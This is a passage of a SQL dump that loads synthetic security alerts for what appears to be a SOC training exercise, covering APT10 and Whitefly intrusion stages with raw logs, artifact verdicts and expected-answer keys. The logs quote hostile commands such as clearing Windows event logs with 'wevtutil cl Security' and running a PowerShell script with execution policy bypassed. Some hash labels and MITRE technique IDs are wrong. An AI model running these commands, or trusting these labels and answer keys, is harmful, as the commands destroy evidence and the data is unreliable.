attempt.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"encrypted_payload.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"DLP Database\",\"verdict\":\"suspicious\",\"details\":\"File involved in suspected data exfiltration.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used by APT3.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(389, 'Initial Access via Compromised MSP Credentials', 'high', 'Authentication Logs', 'APT10 exploits stolen credentials from a managed service provider to infiltrate the aerospace company\'s network, setting the stage for a prolonged espionage campaign. Anomalous login detected from an external IP address using compromised MSP credentials.', 'Credential Theft', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:45:00Z\",\"event_type\":\"authentication_attempt\",\"username\":\"msp_admin@aerospacecompany.com\",\"auth_status\":\"success\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"method\":\"password\",\"event_id\":\"auth-789654\",\"mfa_status\":\"not_required\"}', '2026-01-04 02:14:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"msp_admin@aerospacecompany.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Compromised managed service provider credentials.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known threat actor activities.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal aerospace company network IP.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(390, 'Execution Using DLL Side-Loading', 'high', 'Application Logs', 'The threat actors employ DLL side-loading to execute their malicious code under the guise of trusted applications, evading traditional detection mechanisms.', 'Execution', 'T1073.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_id\":\"4624\",\"application\":\"legitapp.exe\",\"loaded_dll\":\"msvcr110.dll\",\"original_dll_path\":\"C:\\\\Program Files\\\\LegitApp\\\\msvcr110.dll\",\"malicious_dll_path\":\"C:\\\\Temp\\\\msvcr110.dll\",\"executing_user\":\"jdoe\",\"source_ip\":\"192.168.1.45\",\"attacker_ip\":\"203.0.113.45\",\"hash_malicious_dll\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"malware_name\":\"APT10_SideLoad\"}', '2026-01-04 02:14:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"filename\",\"value\":\"msvcr110.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as a malicious DLL used in side-loading attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT10_SideLoad malware.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"Known command and control server for APT10 operations.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account on the network.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(391, 'Establishing Persistence with Backdoor Implant', 'high', 'System Registry Changes', 'APT10 has been detected establishing long-term persistence by deploying a backdoor implant within the aerospace company\'s network. The attack involved registry modifications pointing to a malicious service executable.', 'Persistence', 'T1050: New Service', 1, 'new', NULL, '{\"time\":\"2023-09-15T14:23:45Z\",\"event_id\":7045,\"source_ip\":\"203.0.113.5\",\"internal_ip\":\"192.168.1.20\",\"user\":\"jdoe\",\"registry_key\":\"HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\MaliciousService\",\"service_name\":\"MaliciousService\",\"image_path\":\"C:\\\\Windows\\\\System32\\\\malicious.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"Service Installed\",\"description\":\"A new service was installed on the machine to maintain persistence.\"}', '2026-01-04 02:14:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT10 command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Sandbox\",\"verdict\":\"malicious\",\"details\":\"Executable file used by APT10 for persistence.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known APT10 malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account used during the attack.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(392, 'Lateral Movement to Access Design Servers', 'high', 'Network Traffic Analysis', 'During the investigation of unusual network patterns, it was identified that a malicious entity performed lateral movement within the corporate network to access critical design servers. The attackers employed techniques consistent with the APT10 group\'s TTPs, leveraging compromised credentials to gain unauthorized access to servers containing sensitive CAD files. This alert represents step 4 of the operation where the attackers successfully reached the target servers.', 'Lateral Movement', 'T1080: Taint Shared Content', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:22:18Z\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"10.0.0.45\",\"attacker_ip\":\"203.0.113.45\",\"user\":\"j.doe@company.com\",\"accessed_file\":\"designServerAccess.log\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"lateral_move\",\"result\":\"success\",\"protocol\":\"SMB\",\"malware\":\"CloudHopper\",\"description\":\"Lateral movement detected towards design server using stolen credentials.\",\"os\":\"Windows Server 2019\"}', '2026-01-04 02:14:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Target design server IP.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP associated with APT10.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with CloudHopper malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"designServerAccess.log\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"clean\",\"details\":\"Log file accessed during lateral movement.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"j.doe@company.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Compromised user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NULL', 1, 0, NULL),
(393, 'Data Collection from CAD Repositories', 'high', 'File Access Logs', 'APT10 is actively collecting large CAD files from compromised servers within the aerospace sector. This operation stage focuses on aggregating these files for planned exfiltration.', 'Collection', 'T1119 - Automated Collection', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:47Z\",\"event_id\":\"file_access_8765\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"user\":\"j.doe\",\"access_type\":\"read\",\"file_name\":\"aerospace_project_design.cad\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_size\":\"15MB\",\"protocol\":\"SMB\",\"action\":\"access_granted\"}', '2026-01-04 02:14:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT10 IP involved in previous aerospace sector attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised server.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"aerospace_project_design.cad\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Integrity Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Sensitive CAD file targeted by APT10.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Hash Database\",\"verdict\":\"clean\",\"details\":\"Common placeholder hash, needs further investigation for exact matches.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(394, 'Exfiltration of CAD Files via Encrypted Channels', 'high', 'Outbound Network Traffic', 'APT10 is utilizing encrypted channels to exfiltrate CAD files from the network. The operation involves transferring data to a known malicious external IP using SSL/TLS encryption, making detection challenging.', 'Exfiltration', 'T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 ', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"exfil-20231012-001\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"TLS\",\"encrypted_data_size\":\"15MB\",\"file_hash\":\"9e107d9d372bb6826bd81d3542a419d6\",\"filename\":\"designs_v3_aggregated.zip\",\"user\":\"jdoe\",\"process_name\":\"explorer.exe\",\"indicator_of_compromise\":[{\"type\":\"ip\",\"value\":\"203.0.113.45\"},{\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\"},{\"type\":\"filename\",\"value\":\"designs_v3_aggregated.zip\"}],\"alert_description\":\"Observed encrypted data transfer to a known malicious IP associated with APT10.\"}', '2026-01-04 02:14:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT10 infrastructure component.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with data exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"designs_v3_aggregated.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"suspicious\",\"details\":\"File name pattern matches previous exfiltration attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(395, 'Clean-up and Cover Tracks', 'high', 'System Event Logs', 'The attackers attempted to erase logs and artifacts to obscure their presence and activities within the network. This is a typical step in their operation to remove traces of intrusion.', 'Defensive Evasion', 'T1070', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:35Z\",\"event_id\":4625,\"event_type\":\"Security\",\"action\":\"Log Deletion\",\"username\":\"admin_user\",\"host_ip\":\"10.0.0.15\",\"source_ip\":\"203.0.113.45\",\"log_file\":\"C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\Security.evtx\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"process\":\"wevtutil.exe\",\"command_line\":\"wevtutil cl Security\"}', '2026-01-04 02:14:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT10 activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with potential malicious activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(396, 'Suspicious Network Activity Detected', 'high', 'Network Intrusion Detection System (NIDS)', 'Initial access attempt identified through a phishing email containing a malicious link, typically used by the Whitefly group. The email was sent to an internal user and contained a link leading to the download of a malicious payload.', 'Initial Access', 'T1566.001 - Spearphishing Link', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"protocol\":\"HTTP\",\"url\":\"http://malicious-example.com/download\",\"email_sender\":\"hacker@example.com\",\"email_recipient\":\"user@internal.com\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"file_hash\":\"2b8e5d8f7e9c4f8a9b6e5d9f7c6b8e5d\",\"filename\":\"invoice.pdf\",\"alert\":\"Phishing Link Detected\",\"ids_reference\":\"NIDS-2345\"}', '2026-01-04 02:15:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host targeted by phishing email.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-example.com/download\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware URL Database\",\"verdict\":\"malicious\",\"details\":\"URL hosting a known malicious payload.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"hacker@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Email address associated with phishing activities.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"2b8e5d8f7e9c4f8a9b6e5d9f7c6b8e5d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash identified as a malicious payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(397, 'Execution of Malicious Script', 'high', 'Endpoint Detection and Response (EDR)', 'An advanced malicious script execution was detected on the endpoint, aiming to establish a foothold by deploying the Vcrodat malware. The script was initially downloaded via a phishing link.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:08Z\",\"event_type\":\"execution\",\"host\":{\"hostname\":\"compromised-endpoint\",\"ip\":\"192.168.1.105\"},\"user\":\"jdoe\",\"process\":{\"name\":\"powershell.exe\",\"pid\":4567,\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.ps1\"},\"file\":{\"path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.ps1\",\"hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\"},\"network\":{\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":80},\"malware\":{\"name\":\"Vcrodat\",\"signature_version\":\"1.2.3\",\"hash\":\"6a2da3a46e0f4e8b8a7d4b2a2c8e7a5f\"}}', '2026-01-04 02:15:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malware distribution.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected in previous malware incidents.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"6a2da3a46e0f4e8b8a7d4b2a2c8e7a5f\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches the Vcrodat malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename typically used in phishing attacks.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Employee account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(398, 'Vcrodat Malware Persistence Mechanism', 'high', 'System Logs', 'The Vcrodat malware has been observed manipulating registry keys for persistence. This is a known tactic of the Whitefly group to ensure continuous access to compromised systems. The malware modifies the registry key to execute a malicious payload upon system startup.', 'Persistence', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:21Z\",\"source_ip\":\"103.245.222.133\",\"destination_ip\":\"192.168.1.15\",\"username\":\"jdoe\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousApp\",\"registry_value_name\":\"MaliciousApp\",\"registry_value_data\":\"C:\\\\Windows\\\\System32\\\\ncsvc.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"process_id\":4824,\"process_name\":\"ncsvc.exe\"}', '2026-01-04 02:15:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"103.245.222.133\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with Vcrodat malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ncsvc.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Malicious executable used for persistence.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User\'s account may be compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES
(399, 'Compromised Open-Source Tool Identified', 'high', 'Open-Source Intelligence (OSINT)', 'An open-source tool frequently used by developers has been modified to include malicious code. The tool is leveraging legitimate traffic patterns to avoid detection by security systems. The malicious code attempts to establish a connection with a known malicious IP and downloads additional payloads.', 'Defense Evasion', 'T1562.001 - Impair Defenses: Disable or Modify Tools', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:25:36Z\",\"event_id\":\"EVT-1004\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"tool_name\":\"OpenSourceDevTool\",\"malicious_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"file_path\":\"/usr/local/bin/OpenSourceDevTool\",\"action\":\"download\",\"payload_url\":\"http://malicious.example.com/payload\",\"status\":\"success\"}', '2026-01-04 02:15:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware signature\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"/usr/local/bin/OpenSourceDevTool\",\"is_critical\":false,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"suspicious\",\"details\":\"Modified version of a known open-source tool\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious.example.com/payload\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"URL hosting malicious payload\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(400, 'Unauthorized Credentials Accessed', 'high', 'Security Information and Event Management (SIEM)', 'Compromised credentials were used by the attacker to perform lateral movement within the network. The attacker, associated with the Whitefly group, utilized stolen credentials to access multiple systems, potentially exfiltrating sensitive data.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_type\":\"authentication\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"username\":\"jdoe_admin\",\"action\":\"login_success\",\"details\":{\"method\":\"RDP\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"whitefly_tool.exe\"},\"network\":{\"src_port\":3389,\"dest_port\":3389}}', '2026-01-04 02:15:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Whitefly APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within corporate network.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"suspicious\",\"details\":\"Admin account used in unauthorized manner.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a tool used by Whitefly for lateral movement.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"whitefly_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"File used in conjunction with Whitefly\'s attack strategies.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'NULL', 1, 0, NULL),
